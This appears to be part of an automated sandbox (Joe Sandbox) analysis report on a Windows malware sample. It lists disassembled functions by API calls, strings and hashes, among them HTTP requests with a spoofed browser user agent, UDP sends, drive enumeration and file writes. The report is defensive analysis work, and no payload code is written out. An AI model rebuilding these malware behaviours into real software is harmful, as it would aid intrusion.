                                                                                                                    • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040EA47
                                                                                                                    • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EA66
                                                                                                                    • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040EA8F
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040EAB8
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040EAC2
                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040EACD
                                                                                                                    Strings
                                                                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 0040EA42
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                                                                    • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                    • API String ID: 2743515581-2960703779
                                                                                                                    • Opcode ID: ef8e19ed345852c8d52971dd1004b0fcc021cc447378e9d991bc7cd61a6891ce
                                                                                                                    • Instruction ID: 45b81d3650d60dd7d70083547d95fe89803667d47bfd0af2cf5eef3cde06382e
                                                                                                                    • Opcode Fuzzy Hash: ef8e19ed345852c8d52971dd1004b0fcc021cc447378e9d991bc7cd61a6891ce
                                                                                                                    • Instruction Fuzzy Hash: 4021E774A40308BBEB11DB94CC49FEEB775BB48705F1085A9FA11AA2C0C7B96A40CB55
                                                                                                                    Function 00405BC0 Relevance: 12.1, APIs: 8, Instructions: 97fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InitializeCriticalSection.KERNEL32(00415E30,?,?,?,?,?,00407A20), ref: 00405BCB
                                                                                                                    • CreateFileW.KERNEL32(00416060,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00407A20), ref: 00405BE5
                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405C06
                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405C25
                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 00405C3E
                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00405CCB
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00405CD5
                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 00405CDF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3956458805-0
                                                                                                                    • Opcode ID: b6454fe67246050de154b4b2d7b685814819646854cbf1c4f394f4a459172caa
                                                                                                                    • Instruction ID: 44e1aa5071e985e1939c8a19f3b292d5e35966d71e561f6040ad28af9ac572d1
                                                                                                                    • Opcode Fuzzy Hash: b6454fe67246050de154b4b2d7b685814819646854cbf1c4f394f4a459172caa
                                                                                                                    • Instruction Fuzzy Hash: 4B31FD74E44309EBEB14DBA4CD49BAFBB74EB48700F208569E601772C0D7B96941CF99
                                                                                                                    Function 00406060 Relevance: 10.7, APIs: 7, Instructions: 176fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(00415E30,00000000,0040B8F2,006A0266,?,0040B90E,00000000,0040D0A4,?), ref: 0040606F
                                                                                                                    • memcpy.NTDLL(?,00000000,00000100), ref: 00406101
                                                                                                                    • CreateFileW.KERNEL32(00416060,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00406225
                                                                                                                    • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00406287
                                                                                                                    • FlushFileBuffers.KERNEL32(000000FF), ref: 00406293
                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040629D
                                                                                                                    • LeaveCriticalSection.KERNEL32(00415E30,?,?,?,?,?,?,0040B90E,00000000,0040D0A4,?), ref: 004062A8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1457358591-0
                                                                                                                    • Opcode ID: b744e7b7a8629e3496ebe2098ab67372d645442e6c28ada4e438c42de121c9cd
                                                                                                                    • Instruction ID: bb102638da67a563b53aa46b2a5b6ce2f3b38349fb156310049a7a66f3822ae6
                                                                                                                    • Opcode Fuzzy Hash: b744e7b7a8629e3496ebe2098ab67372d645442e6c28ada4e438c42de121c9cd
                                                                                                                    • Instruction Fuzzy Hash: 1D71DEB5E002099BCB04DF94D981FEFB7B1BB88304F14816DE505BB382D779A951CBA5
                                                                                                                    Function 0040E240 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E2FC
                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E34B
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E35F
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E377
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                    • String ID: device$deviceType
                                                                                                                    • API String ID: 1602765415-3511266565
                                                                                                                    • Opcode ID: 1b177aca5382db3f1c66da14849aee522d75b48b0e19709232399be15e741896
                                                                                                                    • Instruction ID: d9bf12878483276118e69e011fb1eaaed98ea0d23904e8601ea4f62f39df24ad
                                                                                                                    • Opcode Fuzzy Hash: 1b177aca5382db3f1c66da14849aee522d75b48b0e19709232399be15e741896
                                                                                                                    • Instruction Fuzzy Hash: C4412D74A0020ADFCB04DF95C884FAFBBB5BF49304F108969E915A7390D778AD81CB95
                                                                                                                    Function 0040E0E0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E19C
                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E1EB
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E1FF
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E217
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                    • String ID: service$serviceType
                                                                                                                    • API String ID: 1602765415-3667235276
                                                                                                                    • Opcode ID: 99a16f71be16d8847cb7d1021c7ddccdc4dc2b0592ef80971ad883e08ff36aa9
                                                                                                                    • Instruction ID: 8be64e74ab35422ce5b67f5b255e261f781d2e412f5a45cda6e842047ddde31e
                                                                                                                    • Opcode Fuzzy Hash: 99a16f71be16d8847cb7d1021c7ddccdc4dc2b0592ef80971ad883e08ff36aa9
                                                                                                                    • Instruction Fuzzy Hash: BB41E874A0020ADFCB14CF99C884BAFB7B9BF48304F1085ADE515A7390D778AA81CF95
                                                                                                                    Function 004022C0 Relevance: 10.6, APIs: 7, Instructions: 95COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3168844106-0
                                                                                                                    • Opcode ID: d030d70e23b1ee81df40ddde676cc41bbc8b28927f5a1e966705551878972145
                                                                                                                    • Instruction ID: 16d4c05c25790a512fd8f3a1e6e85bd280fefa1845e4e3e4af960acff63a7a98
                                                                                                                    • Opcode Fuzzy Hash: d030d70e23b1ee81df40ddde676cc41bbc8b28927f5a1e966705551878972145
                                                                                                                    • Instruction Fuzzy Hash: DE31D1722012059FC310AFB5FD8CAD7B7A8FF44324F04863EE559D3280D778A4449BA9
                                                                                                                    Function 0040E281 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E2FC
                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E34B
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E35F
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E377
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                    • String ID: device$deviceType
                                                                                                                    • API String ID: 1602765415-3511266565
                                                                                                                    • Opcode ID: 7884966aedb5b48ec66d747cdb098c486fa550d692640b6eadd274145b97d250
                                                                                                                    • Instruction ID: b41677b7307b510c0c46b42eeb4edde7184acd44519d028b9e49cf38c7e22350
                                                                                                                    • Opcode Fuzzy Hash: 7884966aedb5b48ec66d747cdb098c486fa550d692640b6eadd274145b97d250
                                                                                                                    • Instruction Fuzzy Hash: 24310C74A0020ADFCB14DF95C884FAFBBB5BF88304F108969E915B7390D778A981CB95
                                                                                                                    Function 0040E121 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E19C
                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E1EB
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E1FF
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E217
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                    • String ID: service$serviceType
                                                                                                                    • API String ID: 1602765415-3667235276
                                                                                                                    • Opcode ID: 1c5e78dc8b18edf47e620e5ac62898c9c9dab53ef6afcc05c5ff165d884242d4
                                                                                                                    • Instruction ID: ad2fb0e2655c549c540ff47f191a76fdb33d2d75a9b1b61af0e22c3c344479bd
                                                                                                                    • Opcode Fuzzy Hash: 1c5e78dc8b18edf47e620e5ac62898c9c9dab53ef6afcc05c5ff165d884242d4
                                                                                                                    • Instruction Fuzzy Hash: 7B31CD74E0020ADBCB14CFD5D884BAFB7B9BF88304F1085A9E515A7390D7789A41CF95
                                                                                                                    Function 00407440 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleep$CacheDeleteEntrywsprintf
                                                                                                                    • String ID: %s%s
                                                                                                                    • API String ID: 1447977647-3252725368
                                                                                                                    • Opcode ID: 78ec990633dcb6ec7f944f4e4d58fe3f4f1b713779a899723d42b03c5855964e
                                                                                                                    • Instruction ID: 516f793b53608c34cc4cf2fa152c24c34b7f811ac1bf05daad4eae6c0a67dd49
                                                                                                                    • Opcode Fuzzy Hash: 78ec990633dcb6ec7f944f4e4d58fe3f4f1b713779a899723d42b03c5855964e
                                                                                                                    • Instruction Fuzzy Hash: DB31FAB0D00218ABCB50DFA9D8887DDBBB4FB08305F1085AAE519B6291D7795AC4CF5A
                                                                                                                    Function 004063A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetLogicalDrives.KERNEL32 ref: 004063A6
                                                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 004063F4
                                                                                                                    • RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406421
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040643E
                                                                                                                    Strings
                                                                                                                    • NoDrives, xrefs: 00406418
                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 004063E7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseDrivesLogicalOpenQueryValue
                                                                                                                    • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                                                                    • API String ID: 2666887985-3471754645
                                                                                                                    • Opcode ID: 314293f9e134081a44844c09a9b0f17b23a1eb3db84437885ffb7fb3e0008323
                                                                                                                    • Instruction ID: 69498c8574f0fe75ee0e18bc350880e9ca7d597cc08e8ba402afd13981da7d97
                                                                                                                    • Opcode Fuzzy Hash: 314293f9e134081a44844c09a9b0f17b23a1eb3db84437885ffb7fb3e0008323
                                                                                                                    • Instruction Fuzzy Hash: AC11DD71E4020A9BDB10CFD4D946BEEBBB4FB08708F118159E911B7280D7B85695CF99
                                                                                                                    Function 0040D160 Relevance: 9.1, APIs: 6, Instructions: 80threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D184
                                                                                                                      • Part of subcall function 0040D250: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D290
                                                                                                                      • Part of subcall function 0040D250: CloseHandle.KERNEL32(?), ref: 0040D2A9
                                                                                                                    • CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D1DF
                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D21C
                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D227
                                                                                                                    • DuplicateHandle.KERNEL32(00000000), ref: 0040D22E
                                                                                                                    • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D242
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2251373460-0
                                                                                                                    • Opcode ID: 0f4ce32234228e51373a718084f49bdd165b62b4cc5873150e0a73e2794c4448
                                                                                                                    • Instruction ID: b4a3372add05cffca1b77c7dac60b50b4844df58a08520f3d20c10534500f2db
                                                                                                                    • Opcode Fuzzy Hash: 0f4ce32234228e51373a718084f49bdd165b62b4cc5873150e0a73e2794c4448
                                                                                                                    • Instruction Fuzzy Hash: 6B31D6B4A00209EFDB04DF98D889F9EBBB5FB48304F1081A8E905A7391D775EA95CF54
                                                                                                                    Function 00407370 Relevance: 9.1, APIs: 6, Instructions: 65sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleep$CountTickrandsrand
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3488799664-0
                                                                                                                    • Opcode ID: c117d04b20163f9f953f828aeedb65ed40a1637f383e1ba8009b9b023e8ebc44
                                                                                                                    • Instruction ID: b6b36855a0edcd25512206b50fb5473dda965f97846ebbbd8b428d1493e324f4
                                                                                                                    • Opcode Fuzzy Hash: c117d04b20163f9f953f828aeedb65ed40a1637f383e1ba8009b9b023e8ebc44
                                                                                                                    • Instruction Fuzzy Hash: 1D21D875E04208FBD704DF60D8856AE7B31EB45304F10C47AED026B381DA79AA80DB56
                                                                                                                    Function 00408EB0 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _allshl_aullshr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 673498613-0
                                                                                                                    • Opcode ID: b6c741ae3234a389a253b0a23420a389dbca14ef940f6469a5e268d1ed8ccdf8
                                                                                                                    • Instruction ID: 40a613cc88bb75a9b4956eb5c221db2524b4544d5556699ad57a8543b44bc28a
                                                                                                                    • Opcode Fuzzy Hash: b6c741ae3234a389a253b0a23420a389dbca14ef940f6469a5e268d1ed8ccdf8
                                                                                                                    • Instruction Fuzzy Hash: 3B111F32510518AB8B10EF6FC44268ABBD6EF843A1B25C136FC2CDF359D634DA514BD8
                                                                                                                    Function 00401200 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
                                                                                                                    • htons.WS2_32(?), ref: 00401281
                                                                                                                    • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                                                                    • String ID: pdu
                                                                                                                    • API String ID: 2164660128-2320407122
                                                                                                                    • Opcode ID: ad0a036109145f249a08ec8e181f2c3f15924be3383878ad7f1db0ee6fe723d0
                                                                                                                    • Instruction ID: d4e165de5104959f260b85937ca272364f863e3dc64df769d8e1baf9f078371f
                                                                                                                    • Opcode Fuzzy Hash: ad0a036109145f249a08ec8e181f2c3f15924be3383878ad7f1db0ee6fe723d0
                                                                                                                    • Instruction Fuzzy Hash: 5831A5762083009BC710DF69D884A9BBBE4AFC9714F04456EFD9897381D634D919C7E7
                                                                                                                    Function 00401820 Relevance: 7.6, APIs: 5, Instructions: 116COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 004018B1
                                                                                                                      • Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                                                      • Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                                                      • Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3966618661-0
                                                                                                                    • Opcode ID: 3b7509c36c549ccc631e3d4bc530e991b8502da243600c65769ed081249f64d8
                                                                                                                    • Instruction ID: 5b2b6301c056c53cf24b756eb28b55477e9028745ee4fe4862f5ad68d4db2f6a
                                                                                                                    • Opcode Fuzzy Hash: 3b7509c36c549ccc631e3d4bc530e991b8502da243600c65769ed081249f64d8
                                                                                                                    • Instruction Fuzzy Hash: 1841B371604A02AFC714EB39D848797F7A4BF88310F14827EE82D933D1E735A855CB99
                                                                                                                    Function 0040AB80 Relevance: 7.6, APIs: 5, Instructions: 74fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNEL32(00416478,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040AC18
                                                                                                                    • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040AC39
                                                                                                                    • FlushFileBuffers.KERNEL32(000000FF), ref: 0040AC43
                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040AC4D
                                                                                                                    • InterlockedExchange.KERNEL32(00415260,0000003D), ref: 0040AC5A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
